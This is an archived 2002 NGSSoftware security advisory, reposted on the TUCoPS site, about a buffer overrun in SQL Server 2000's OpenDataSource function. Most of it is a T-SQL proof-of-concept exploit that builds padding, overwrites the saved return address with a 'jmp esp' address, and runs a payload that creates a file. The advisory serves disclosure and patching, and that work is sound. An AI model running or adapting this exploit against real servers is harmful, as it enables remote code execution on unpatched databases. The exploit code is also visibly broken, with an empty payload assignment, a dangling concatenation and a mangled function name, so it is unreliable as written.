Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: web5470.htm

SQL server remote exploit via OpenDataSource function overflow
20th Jun 2002 [SBWID-5470]

	SQL server remote exploit via OpenDataSource function overflow


	SQL server 2000, Windows 2000 SP 2


	In  Mark  Litchfield   []   and   David   Litchfield
	[] NGSSoftware insight security  research  advisory
	[] [#NISR19062002] :

	Microsoft\'s database server SQL Server 2000 has a remotely  exploitable
	buffer  overrun  vulnerability  in  the  OpenDataSource  function   when
	combined with the MS Jet Engine. Due to this being a JET  problem  other
	products may also be  vulnerable;  however  the  fix  for  all  products
	should be the same.

	By making  a  specially  crafted  SQL  query  using  the  OpenDataSource
	function it is possible to overflow a buffer in the SQL Server  process,
	gaining control of its execution remotely. If the SQL Server is  running
	with SYSTEM  privileges,  this  is  default  behaviour,  then  any  code
	supplied by the  attacker  in  an  exploit  of  the  overflow  will  run
	uninhibited. Whilst the overflow  is  UNICODE  in  nature,  as  will  be
	shown, it is still very easy to exploit.

	What must be stressed is that this may be  launched  via  a  web  server
	application if it is vulnerable to SQL  Injection  so  just  because  no
	direct access can be gained to the SQL Server  from  the  Internet  does
	not mean it is safe. All  customers  running  SQL  Server  should  check
	their patch level.





	This Transact SQL Script will create a file called \"SQL-ODSJET-BO\"  on
	the root of the C: drive


	-- Simple Proof of Concept

	-- Exploits a buffer overrun in OpenDataSource()


	-- Demonstrates how to exploit a UNICODE overflow using T-SQL

	-- Calls CreateFile() creating a file called c:\\SQL-ODSJET-BO

	-- I\'m overwriting the saved return address with 0x42B0C9DC

	-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2

	-- The address holds a jmp esp instruction.


	-- To protect against this overflow download the latest Jet Service

	-- pack from Microsoft -


	-- David Litchfield (

	-- 19th June 2002




	declare @exploit nvarchar(4000)

	declare @padding nvarchar(2000)

	declare @saved_return_address nvarchar(20)

	declare @code nvarchar(1000)

	declare @pad nvarchar(16)

	declare @cnt int

	declare @more_pad nvarchar(100)


	select @cnt = 0

	select @padding = 0x41414141

	select @pad = 0x4141


	while @cnt < 1063


	  select @padding = @padding + @pad

	  select @cnt = @cnt + 1



	-- overwrite the saved return address


	select @saved_return_address = 0xDCC9B042

	select @more_pad = 0x4343434344444444454545454646464647474747


	-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K


	-- change if running a different service pack


	select @code =



	select @exploit = N\'SELECT * FROM

	penDataSource( \'\'Microsoft.Jet.OLEDB.4.0\'\',\'\'Data Source=\"c:\\\'

	select @exploit = @exploit + @padding + @saved_return_address + @more_pad +


	select @exploit = @exploit + N\'\";User ID=Admin;Password=;Extended

	properties=Excel 5.0\'\')...xactions\'

	exec (@exploit)




	Microsoft recommend that customers should upgrade their version of  Jet.
	The latest version is available from here:





	Further good reading from NGSSoftware :



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH